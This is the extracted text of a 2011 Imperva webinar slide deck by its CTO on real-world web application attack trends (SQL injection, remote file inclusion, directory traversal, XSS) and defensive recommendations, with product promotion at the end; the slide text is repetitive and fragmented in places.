The State of Application Security: What Hackers Break

The State of Application Security:What Hackers Break

Amichai Shulman, CTO, Imperva

Agenda

The current state of Web vulnerabilities

Studying hackers

+ Why? Prioritizing defenses

+ How? Methodology

Analyzing real-life attack traffic

+ Key findings

+ Take-aways

Technical recommendations

2

Imperva Overview

Imperva’s mission is simple:Protect the data that drives business

The leader in a new category:Data Security

HQ in Redwood Shores CA; Global Presence

+ Installed in 50+ Countries

1,200+ direct customers; 25,000+ cloud users

+ 3 of the top 5 US banks

+ 3 of the top 10 financial services firms

+ 3 of the top 5 Telecoms

+ 2 of the top 5 food & drug stores

+ 3 of the top 5 specialty retailers

+ Hundreds of small and medium businesses

3

Today’s Presenter

Amichai Shulman – CTO Imperva

Speaker at industry events

+ RSA, Sybase Techwave, Info Security UK, Black Hat

Lecturer on Info Security

+ Technion - Israel Institute of Technology

Former security consultant to banks and financial services firms

Leads the Application Defense Center (ADC)

+ Discovered over 20 commercial application vulnerabilities

– Credited by Oracle, MS-SQL, IBM and others

Amichai Shulman one of InfoWorld’s “Top 25 CTOs”

WhiteHat Security Top Ten—2010

Percentage likelihood of a website having at least one vulnerability sorted by class

The Situation Today

:

:

# of websites(estimated: July 2011)

# ofvulnerabilities

357,292,065

230x

1%

821,771,600vulnerabilities in active circulation

The Situation Today

:

:

# of websites(estimated: July 2011)

# ofvulnerabilities

357,292,065

230x

1%

821,771,600vulnerabilities in active circulation

But which will be exploited?

Studying Hackers

Focus on actual threats

+ Focus on what hackers want, helping good guys prioritize

+ Technical insight into hacker activity

+ Business trends of hacker activity

+ Future directions of hacker activity

Eliminate uncertainties

+ Active attack sources

+ Explicit attack vectors

+ Spam content

Devise new defenses based on real data

+ Reduce guess work

Understanding the Threat Landscape: Methodology

Analyze hacker tools and activity

Tap into hacker forums

Record and monitor hacker activity

+ Categorized attacks across 30 applications

+ Monitored TOR traffic

+ Recorded over 10M suspicious requests

+ 6 months: December 2010-May 2011

Lesson #1: Automation is Prevailing

Attacks are automated

+ Botnets

+ Mass SQL Injection attacks

+ Google dorks


Tools and kits exist for everything


On Average: 27 attacks per hour ≈ 1 attack per 2 min.

Apps under automated attack:25,000 attacks per hour.≈ 7 per second


On Average:

27 attacks per hour

≈ 1 attack per 2 minutes

Apps under automated attack:25,000 attacks per hour.≈ 7 per second

Take-away:Get ready to fight automation

Lesson #2: The ―Unfab‖ Four

Lesson #2A: The ―Unfab‖ FourSQL Injection

Lesson #2B: The ―Unfab‖ FourRemote File Inclusion

Lesson #2B: The ―Unfab‖ FourRemote File Inclusion

Analyzing the parameters and source of an RFI attack enhances common signature-based attack detection.

Lesson #2C: The ―Unfab‖ FourDirectory Traversal

Lesson #2C: The ―Unfab‖ FourDirectory Traversal

Lesson #2D: The ―Unfab‖ FourCross Site Scripting


Lesson #2D: The ―Unfab‖ FourCross Site Scripting – Zooming into Search Engine Poisoning

http://HighRankingWebSite+PopularKeywords+XSS

…http://HighRankingWebSite+PopularKeywords+XSS


New Search Engine Indexing Cycle

Lesson #2: The ―Unfab‖ Four

Take-away:Protect against these common attacks

These may seem obvious common attacks, but RFI and DT do not even appear in OWASP’s top 10 list.

Directory Traversal Missing from OWASP Top 10?

OWASP Rationale:

Directory traversal is covered in the OWASP Top Ten 2010 through the more general case, A4, Insecure Direct Object Reference.

―Insecure Direct Object Reference‖ is different than ―Directory Traversal‖ because in the latter access is made to a resource that, to begin with, should not have been available through the application.

Remote File Inclusion Missing from OWASP Top 10?

A3, OWASP Top 10 2007 - Malicious File Execution. Removed in the OWASP Top 10 2010.

OWASP Rationale:

REMOVED: A3 – Malicious File Execution. This is still a significant problem in many different environments. However, its prevalence in 2007 was inflated by large numbers of PHP applications having this problem. PHP now ships with a more secure configuration by default, lowering the prevalence of this problem.

Lesson #3: The U.S. is the Source of Most Attacks

We witnessed 29% of attack events originating from 10 sources.

Lesson #3: The U.S. is the Source of Most Attacks

Take-away:Sort traffic based on reputation

We witnessed 29% of attack events originating from 10 sources.

Organizations like these Funded a $27B Security Market in 2010…

…All had major breaches in 2011. What’s wrong?

Threat vs. Spending Market Dislocation

1 2011 Data Breach Investigations Report (Verizon RISK Team in conjunction with the US Secret Service & Dutch High Tech Crime Unit)2 Worldwide Security Products 2011-2014 Forecast (IDC - February 2011)

In 2010, 76% of all data

breached was from servers

and applications1

―

‖

Threats Spending

Yet well over 90% of the $27 billion spent on security

products was on traditional

security2

―

‖

The data theft industry is estimated at $1 trillion annually

Organized crime is responsible for 85% of data breaches 1

Summary

Deploy security solutions that deter automated attacks

Detect known vulnerability attacks

Acquire intelligence on malicious sources and apply it in real time

Participate in a security community and share data on attacks

Summary

―Foreknowledge cannot be gotten from ghosts and spirits, cannot be had by analogy, cannot be found out by calculation. It must be obtained from people, people who know the conditions of the enemy‖ 1

1 Sun Tzu – The art of war

Usage

Audit

Access

Control

Rights

Management

Attack

Protection

Reputation

Controls

Virtual

Patching

Imperva: Our Story in 60 Seconds

Webinar Materials

Post-Webinar Discussions

Answers to Attendee Questions

Webinar Recording Link

Much more…

Get LinkedIn to Imperva Data Security Direct for…

http://www.linkedin.com/groups/Imperva-Data-Security-Direct-3849609

Questions

- CONFIDENTIAL -

Thank You

- CONFIDENTIAL -